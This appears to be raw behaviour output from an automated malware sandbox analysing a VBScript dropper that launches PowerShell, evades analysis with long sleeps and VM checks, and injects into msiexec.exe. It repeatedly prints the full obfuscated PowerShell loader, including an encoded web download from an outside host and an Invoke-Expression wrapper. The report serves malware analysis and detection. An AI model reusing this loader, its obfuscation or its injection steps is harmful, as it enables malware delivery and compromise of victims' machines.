              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Initial fileInitial file: Do While Lrebrevene.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6801Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3001Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6950Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2519Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 7100Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6016Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 6356Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000002.1122485060.000001DF4E597000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1113145222.000001DF50490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1112680086.000001DF50490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1123009368.000001DF50428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1120557473.000001DF50490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1113781279.000001DF50490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1120994601.000001DF50427000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1120262231.000001DF5041D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1113609163.000001DF50428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1123204458.000001DF50490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1113256887.000001DF50401000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2385113202.000001B67405A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.1379267197.00000225FA1FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PING.EXE, 00000002.00000002.1118260242.000001DE98249000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
              Source: msiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXYg%SystemRoot%\system32\mswsock.dll%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07C179CE LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,14_2_07C179CE

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_4504.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4504, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7356, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 39E0000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $uncaramelised;function spuledes($soncy){ .($industrivirksomheders) ($soncy)} function paining($kortform){$suprascapular225=4;do{$ancientest+=$kortform[$suprascapular225];$suprascapular225+=5;$rockerkrig=format-list} until(!$kortform[$suprascapular225])$ancientest}$strghandlen=paining 'erhvnpoulehje tcere.enclw';$strghandlen+=paining 'sneaebrugbbla cov rlfin ipr ee argnkelpt';$cravenhearted=paining ' pplmst robenezscoriaraploverloweraudvi/';$where=paining ' gert retl hydsbitt1fast2';$cellobiose='carl[ch.rnsmaaeso ftmono.engrsalfaea.skr l,nvly tiovercsammep.akp,espotid,isu gnb gftafsemsoc abroencensa uslgmobiesljfr.air]c mo:mosa:polysesurespekcrrinub,korke tirecotstvdyea eptrevrsparodyfltegneotrapcbloko kryltryk=s.ua$,uscwbos hstnke iterd.age';$cravenhearted+=paining 'a,th5 amy.hogn0galg emp(kontw capisk.fncontd.yreoko pw,redsunna mensnurettbust beha1sass0data..ppl0staa; for smagw disifestn til6 ol4ufo,;gyps ssex nar6sven4amat;m ka ktt.rteknvmene:afko1inve3linj4cont. m,v0sept)sex, crocgspytettnecairvkne.eodato/uku.2 ou0fors1paar0 cum0 dag1dipo0impr1hypn leaf evii ammrbraeebr,mf hygo bruxoro./t yk1ajou3t np4hogf.ni e0';$unfauceted=paining 'roc.ume,asby.net.kbreven-greeaportg brae phenordst';$disbursable=paining 'pa thmetetbiblt,rivpf,rssc.ar: for/ je,/syridailcrabsyifrasvforlehove.snvrgrickou,saosk vg canloxmaedi,t. islcgentoenf mraah/g leutaalctwan?.taveconrx .mvp.steosrh rcarptempi=hvisd hetofredwmissn entlrepaoabsta p.rdtilb&ariai sard fr,=kbte1 ilmi mu 7lgbrdalt.wakk fvig rblokp bemhbemavfejl9b.utuobol6 ktiar lsaa,sudborg6 mosiuniornavayutily fil6def 3humdbdiktwh dgg fo,ys.ceeattr4conc-simp0 rivqf lkc';$benzinmotorernes=paining 'ere >';$industrivirksomheders=paining 'vaulieav etanyx';$samfundshjlperens='fredningsplanerne';$cocoon='\squarely154.gen';spuledes (paining ' a,s$miljgbrnel udeoflorb hura till ,nh:tri,pharmasoutv tiiout ndrecsrut =bonn$af.aeflinnpensv ur:accrasirtpvag.p ferdsemiaprept hica wee+out.$aubacerytoa.ymcungaobo,yoga,nn');spuledes (paining ' r.g$ micgr jslsatsogophb ooratantla ba: sc minfia ummkapsmd ngorundn rkeisekusafklmpart=fork$t ssd kafirailspachb co uallorhin st lgaa tabrygtlulvee ve.con,s,salp ummlkbelibemgt tri( ndi$wel b .lieopk npee,z sa.iadeln resmbremod,aitt psounterafg ewo drfin.neth e l gsford)');spuledes (paining $cellobiose);$disbursable=$mammonism[0];$forevigende=(paining 'l ce$rbd gcherl parokv.kbkamgaalmalvanr:fodeue akdoutbfleuclhutuadiktacayadstildolymesternforne th.sghan=ho.enbagkeeuphwkirk- claoekspbpinnjcen.e.dskcpredthy,o slacsfagmygamesinert pheecarnmball.pidd$indss djotgadgrsejlgtermh knaakrign appd liglfagfemegan');spuledes ($forevigende);spuledes (paining 'lago$esa,unapod mof c ll.risa.ulkaveksdnonpdrente a,enfaziesul,sprev. ,xeh fo,efritaluded udfeudplrk.ntsvali[ l n$legaud.pin berfdamea.ntiuant cstryequict tare u,bdhvid] per=frdi$uncocformrlittap kevdawfemacan esu
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $uncaramelised;function spuledes($soncy){ .($industrivirksomheders) ($soncy)} function paining($kortform){$suprascapular225=4;do{$ancientest+=$kortform[$suprascapular225];$suprascapular225+=5;$rockerkrig=format-list} until(!$kortform[$suprascapular225])$ancientest}$strghandlen=paining 'erhvnpoulehje tcere.enclw';$strghandlen+=paining 'sneaebrugbbla cov rlfin ipr ee argnkelpt';$cravenhearted=paining ' pplmst robenezscoriaraploverloweraudvi/';$where=paining ' gert retl hydsbitt1fast2';$cellobiose='carl[ch.rnsmaaeso ftmono.engrsalfaea.skr l,nvly tiovercsammep.akp,espotid,isu gnb gftafsemsoc abroencensa uslgmobiesljfr.air]c mo:mosa:polysesurespekcrrinub,korke tirecotstvdyea eptrevrsparodyfltegneotrapcbloko kryltryk=s.ua$,uscwbos hstnke iterd.age';$cravenhearted+=paining 'a,th5 amy.hogn0galg emp(kontw capisk.fncontd.yreoko pw,redsunna mensnurettbust beha1sass0data..ppl0staa; for smagw disifestn til6 ol4ufo,;gyps ssex nar6sven4amat;m ka ktt.rteknvmene:afko1inve3linj4cont. m,v0sept)sex, crocgspytettnecairvkne.eodato/uku.2 ou0fors1paar0 cum0 dag1dipo0impr1hypn leaf evii ammrbraeebr,mf hygo bruxoro./t yk1ajou3t np4hogf.ni e0';$unfauceted=paining 'roc.ume,asby.net.kbreven-greeaportg brae phenordst';$disbursable=paining 'pa thmetetbiblt,rivpf,rssc.ar: for/ je,/syridailcrabsyifrasvforlehove.snvrgrickou,saosk vg canloxmaedi,t. islcgentoenf mraah/g leutaalctwan?.taveconrx .mvp.steosrh rcarptempi=hvisd hetofredwmissn entlrepaoabsta p.rdtilb&ariai sard fr,=kbte1 ilmi mu 7lgbrdalt.wakk fvig rblokp bemhbemavfejl9b.utuobol6 ktiar lsaa,sudborg6 mosiuniornavayutily fil6def 3humdbdiktwh dgg fo,ys.ceeattr4conc-simp0 rivqf lkc';$benzinmotorernes=paining 'ere >';$industrivirksomheders=paining 'vaulieav etanyx';$samfundshjlperens='fredningsplanerne';$cocoon='\squarely154.gen';spuledes (paining ' a,s$miljgbrnel udeoflorb hura till ,nh:tri,pharmasoutv tiiout ndrecsrut =bonn$af.aeflinnpensv ur:accrasirtpvag.p ferdsemiaprept hica wee+out.$aubacerytoa.ymcungaobo,yoga,nn');spuledes (paining ' r.g$ micgr jslsatsogophb ooratantla ba: sc minfia ummkapsmd ngorundn rkeisekusafklmpart=fork$t ssd kafirailspachb co uallorhin st lgaa tabrygtlulvee ve.con,s,salp ummlkbelibemgt tri( ndi$wel b .lieopk npee,z sa.iadeln resmbremod,aitt psounterafg ewo drfin.neth e l gsford)');spuledes (paining $cellobiose);$disbursable=$mammonism[0];$forevigende=(paining 'l ce$rbd gcherl parokv.kbkamgaalmalvanr:fodeue akdoutbfleuclhutuadiktacayadstildolymesternforne th.sghan=ho.enbagkeeuphwkirk- claoekspbpinnjcen.e.dskcpredthy,o slacsfagmygamesinert pheecarnmball.pidd$indss djotgadgrsejlgtermh knaakrign appd liglfagfemegan');spuledes ($forevigende);spuledes (paining 'lago$esa,unapod mof c ll.risa.ulkaveksdnonpdrente a,enfaziesul,sprev. ,xeh fo,efritaluded udfeudplrk.ntsvali[ l n$legaud.pin berfdamea.ntiuant cstryequict tare u,bdhvid] per=frdi$uncocformrlittap kevdawfemacan esu
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $uncaramelised;function spuledes($soncy){ .($industrivirksomheders) ($soncy)} function paining($kortform){$suprascapular225=4;do{$ancientest+=$kortform[$suprascapular225];$suprascapular225+=5;$rockerkrig=format-list} until(!$kortform[$suprascapular225])$ancientest}$strghandlen=paining 'erhvnpoulehje tcere.enclw';$strghandlen+=paining 'sneaebrugbbla cov rlfin ipr ee argnkelpt';$cravenhearted=paining ' pplmst robenezscoriaraploverloweraudvi/';$where=paining ' gert retl hydsbitt1fast2';$cellobiose='carl[ch.rnsmaaeso ftmono.engrsalfaea.skr l,nvly tiovercsammep.akp,espotid,isu gnb gftafsemsoc abroencensa uslgmobiesljfr.air]c mo:mosa:polysesurespekcrrinub,korke tirecotstvdyea eptrevrsparodyfltegneotrapcbloko kryltryk=s.ua$,uscwbos hstnke iterd.age';$cravenhearted+=paining 'a,th5 amy.hogn0galg emp(kontw capisk.fncontd.yreoko pw,redsunna mensnurettbust beha1sass0data..ppl0staa; for smagw disifestn til6 ol4ufo,;gyps ssex nar6sven4amat;m ka ktt.rteknvmene:afko1inve3linj4cont. m,v0sept)sex, crocgspytettnecairvkne.eodato/uku.2 ou0fors1paar0 cum0 dag1dipo0impr1hypn leaf evii ammrbraeebr,mf hygo bruxoro./t yk1ajou3t np4hogf.ni e0';$unfauceted=paining 'roc.ume,asby.net.kbreven-greeaportg brae phenordst';$disbursable=paining 'pa thmetetbiblt,rivpf,rssc.ar: for/ je,/syridailcrabsyifrasvforlehove.snvrgrickou,saosk vg canloxmaedi,t. islcgentoenf mraah/g leutaalctwan?.taveconrx .mvp.steosrh rcarptempi=hvisd hetofredwmissn entlrepaoabsta p.rdtilb&ariai sard fr,=kbte1 ilmi mu 7lgbrdalt.wakk fvig rblokp bemhbemavfejl9b.utuobol6 ktiar lsaa,sudborg6 mosiuniornavayutily fil6def 3humdbdiktwh dgg fo,ys.ceeattr4conc-simp0 rivqf lkc';$benzinmotorernes=paining 'ere >';$industrivirksomheders=paining 'vaulieav etanyx';$samfundshjlperens='fredningsplanerne';$cocoon='\squarely154.gen';spuledes (paining ' a,s$miljgbrnel udeoflorb hura till ,nh:tri,pharmasoutv tiiout ndrecsrut =bonn$af.aeflinnpensv ur:accrasirtpvag.p ferdsemiaprept hica wee+out.$aubacerytoa.ymcungaobo,yoga,nn');spuledes (paining ' r.g$ micgr jslsatsogophb ooratantla ba: sc minfia ummkapsmd ngorundn rkeisekusafklmpart=fork$t ssd kafirailspachb co uallorhin st lgaa tabrygtlulvee ve.con,s,salp ummlkbelibemgt tri( ndi$wel b .lieopk npee,z sa.iadeln resmbremod,aitt psounterafg ewo drfin.neth e l gsford)');spuledes (paining $cellobiose);$disbursable=$mammonism[0];$forevigende=(paining 'l ce$rbd gcherl parokv.kbkamgaalmalvanr:fodeue akdoutbfleuclhutuadiktacayadstildolymesternforne th.sghan=ho.enbagkeeuphwkirk- claoekspbpinnjcen.e.dskcpredthy,o slacsfagmygamesinert pheecarnmball.pidd$indss djotgadgrsejlgtermh knaakrign appd liglfagfemegan');spuledes ($forevigende);spuledes (paining 'lago$esa,unapod mof c ll.risa.ulkaveksdnonpdrente a,enfaziesul,sprev. ,xeh fo,efritaluded udfeudplrk.ntsvali[ l n$legaud.pin berfdamea.ntiuant cstryequict tare u,bdhvid] per=frdi$uncocformrlittap kevdawfemacan esuJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
